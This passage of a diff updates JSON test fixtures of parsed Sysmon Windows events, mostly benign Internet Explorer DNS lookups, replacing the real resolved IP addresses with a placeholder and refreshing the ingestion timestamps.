Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -378,7 +378,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313742920Z", + "ingested": "2021-12-09T13:49:44.739099600Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T08:14:44.489978500Z'/\u003e\u003cEventRecordID\u003e612\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 08:14:44.489\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-c36f-5eb3-2c07-290000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2184\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\.gvm\\versions\\go1.13.10.windows.amd64\\bin\\go.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\1\\go-build583768550\\b001\\test.test.exe\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=199E1CF5B2250BD515ECCCF4CA686301,IMPHASH=D90D8C7812AEC8DA0FA173AFA1293AB2\u003c/Data\u003e\u003cData Name='IsExecutable'\u003etrue\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -444,17 +444,17 @@ "type": "CNAME" }, { - "data": "23.50.53.192", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -470,14 +470,13 @@ "static-global-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313744140Z", + "ingested": "2021-12-09T13:49:44.739104300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -545,17 +544,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -572,14 +571,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313745326Z", + "ingested": "2021-12-09T13:49:44.739108200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -645,7 +643,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313746515Z", + "ingested": "2021-12-09T13:49:44.739111600Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:40.599567200Z'/\u003e\u003cEventRecordID\u003e2682\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:40.589\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 1\u003c/Data\u003e\u003cData Name='Details'\u003eDWORD (0x00000004)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -720,7 +718,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313747797Z", + "ingested": "2021-12-09T13:49:44.739115900Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T07:27:18.722136100Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 07:27:18.722\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-b2b6-5eb3-18ab-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e776\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\LOCAL SERVICE\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\lastalive0.dat\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=115106F5B338C87AE6836D50DD890DE3DA296367\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -790,12 +788,12 @@ "type": "CNAME" }, { - "data": "23.64.104.249", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "network": { @@ -812,13 +810,13 @@ "linkmaker.itunes.apple.com" ], "ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313749071Z", + "ingested": "2021-12-09T13:49:44.739120700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -877,27 +875,27 @@ }, "answers": [ { - "data": "151.101.1.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.65.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.129.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.193.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -912,16 +910,13 @@ "confiant-integrations.global.ssl.fastly.net" ], "ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313750228Z", + "ingested": "2021-12-09T13:49:44.739125300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -985,12 +980,12 @@ "type": "CNAME" }, { - "data": "20.36.253.92", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "network": { @@ -1006,13 +1001,13 @@ "c.msn.com" ], "ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313751459Z", + "ingested": "2021-12-09T13:49:44.739129700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -1080,17 +1075,17 @@ "type": "CNAME" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -1107,14 +1102,13 @@ "c.bing.com" ], "ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313752974Z", + "ingested": "2021-12-09T13:49:44.739134Z", "code": "22", - 